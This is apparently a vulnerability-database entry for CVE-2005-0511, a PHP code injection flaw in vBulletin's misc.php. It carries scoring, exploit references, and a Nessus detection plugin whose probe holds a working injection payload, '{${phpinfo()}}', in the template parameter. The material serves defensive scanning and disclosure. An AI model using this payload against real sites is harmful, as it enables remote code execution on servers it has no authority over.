Vulnerabilities > CVE-2005-0511 - Unspecified vulnerability in Jelsoft Vbulletin

CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
jelsoft
nessus
exploit available
metasploit

Summary

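misc.php in vBulletin 3.0.6 and earlier, when "Add Template Name in HTML Comments" is enabled, allows remote attackers to execute arbitrary PHP code via nested variables in the template parameter. The Nessus plugin on this page gives the fix as upgrading to vBulletin 3.0.7 or later; the flaw is reachable only while that option is enabled.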

Exploit-Db

  • description: vBulletin <= 3.0.6 php Code Injection. CVE-2005-0511. Webapps exploit for php platform
    id: EDB-ID:832
    last seen: 2016-01-31
    modified: 2005-02-22
    published: 2005-02-22
    reporter: pokley
    source: https://www.exploit-db.com/download/832/
    title: vBulletin <= 3.0.6 php Code Injection
  • description: vBulletin misc.php Template Name Arbitrary Code Execution. CVE-2005-0511. Webapps exploit for php platform
    id: EDB-ID:16896
    last seen: 2016-02-02
    modified: 2010-07-25
    published: 2010-07-25
    reporter: metasploit
    source: https://www.exploit-db.com/download/16896/
    title: vBulletin misc.php Template Name Arbitrary Code Execution

Metasploit

description: This module exploits an arbitrary PHP code execution flaw in the vBulletin web forum software. This vulnerability is only present when the "Add Template Name in HTML Comments" option is enabled. All versions of vBulletin prior to 3.0.7 are affected.
id: MSF:EXPLOIT/UNIX/WEBAPP/PHP_VBULLETIN_TEMPLATE
last seen: 2020-01-16
modified: 2017-07-24
published: 2007-01-05
references: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0511
reporter: Rapid7
source: https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/php_vbulletin_template.rb
title: vBulletin misc.php Template Name Arbitrary Code Execution

Nessus

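NASL family: CGI abuses
NASL id: VBULLETIN_CODE_EXECUTION.NASL
description: The remote version of vBulletin fails to sanitize input to the 'template' parameter of the 'misc.php' script. Provided the 'Add Template Name in HTML Comments' setting in vBulletin is enabled, an unauthenticated attacker may use this flaw to execute arbitrary PHP commands on the remote host.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 17211
published: 2005-02-24
reporter: This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/17211
title: vBulletin misc.php template Parameter PHP Code Injection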
code
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

# Metadata pass: when `description` is set the script only declares the
# attributes below and exits; the check further down does not run.
if (description) {
  # Identity and external references.
  script_id(17211);
  script_version("1.19");
  script_cve_id("CVE-2005-0511");
  script_bugtraq_id(12622);

  script_name(english:"vBulletin misc.php template Parameter PHP Code Injection");

  # Report text shown to the reader of the scan results.
  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows execution of
arbitrary PHP code.");
  script_set_attribute(attribute:"description", value:
"The remote version of vBulletin fails to sanitize input to the
'template' parameter of the 'misc.php' script.  Provided the 'Add
Template Name in HTML Comments' setting in vBulletin is enabled, an
unauthenticated attacker may use this flaw to execute arbitrary PHP
commands on the remote host.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2005/Feb/542");
  script_set_attribute(attribute:"solution", value:
"Upgrade to vBulletin 3.0.7 or later.");

  # Risk scoring.
  # NOTE(review): the base vector rates access complexity as high (AC:H),
  # presumably because the 'Add Template Name in HTML Comments' setting
  # must be enabled; compare with other scorings of CVE-2005-0511 before
  # relying on the severity this plugin reports.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");

  # Exploitability flags.
  # NOTE(review): "exploit_available" is "false" although the temporal
  # vector carries E:F and "exploit_framework_metasploit" is "true";
  # confirm which value is intended before filtering findings on it.
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"metasploit_name", value:'vBulletin misc.php Template Name Arbitrary Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  # Dates, plugin type and affected product.
  script_set_attribute(attribute:"plugin_publication_date", value: "2005/02/24");
  script_set_attribute(attribute:"vuln_publication_date", value: "2005/02/22");
  script_cvs_date("Date: 2018/11/15 20:50:19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:vbulletin:vbulletin");
  script_end_attributes();

  # NOTE(review): the summary states that the check executes phpinfo() on
  # the target, yet the category is ACT_GATHER_INFO rather than a more
  # intrusive one such as ACT_ATTACK; confirm this is acceptable for scans
  # that are expected to be non-intrusive.
  script_summary(english:"Executes phpinfo() on the remote host");
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");

  # Scheduling: declares vbulletin_detect.nasl as a dependency, requires the
  # "www/vBulletin" KB key and a web port, and excludes hosts where the
  # "Settings/disable_cgi_scanning" key is set.
  script_dependencies("vbulletin_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/vBulletin");
  exit(0);
}

# Check starts here
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Pick the web port to test and stop early when the host cannot serve PHP.
port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);

# Look up the vBulletin install recorded in the KB for this port
# (presumably written by vbulletin_detect.nasl, the declared dependency).
kb_entry = get_kb_item(string("www/", port, "/vBulletin"));
if (isnull(kb_entry)) exit(0);

# The entry is expected to read "<something> under <path>"; only the path
# (second capture group) is used. Anything else ends the check quietly.
parts = eregmatch(string:kb_entry, pattern:"^(.+) under (/.*)$");
if (isnull(parts)) exit(0);

# Single GET against misc.php with a template value that makes a vulnerable
# install render phpinfo(). NOTE(review): on a vulnerable host this request
# runs PHP code on the target and returns its full PHP configuration in the
# response, so treat the traffic and any stored response as sensitive.
base = parts[2];
probe = base + "/misc.php?do=page&template={${phpinfo()}}";
reply = http_send_recv3(method:"GET", item:probe, port:port);
if (isnull(reply)) exit(0);

# reply[2] is the response body; the phpinfo() page title is the marker.
# A miss does not prove the install is patched: per the plugin description
# the flaw is only reachable while 'Add Template Name in HTML Comments' is
# enabled, so version information should be checked as well.
body = reply[2];
if ("<title>phpinfo()</title>" >< body) security_warning(port);

Packetstorm

data source: https://packetstormsecurity.com/files/download/82364/php_vbulletin_template.rb.txt
id: PACKETSTORM:82364
last seen: 2016-12-05
published: 2009-10-30
reporter: str0ke
source: https://packetstormsecurity.com/files/82364/vBulletin-misc.php-Template-Name-Arbitrary-Code-Execution.html
title: vBulletin misc.php Template Name Arbitrary Code Execution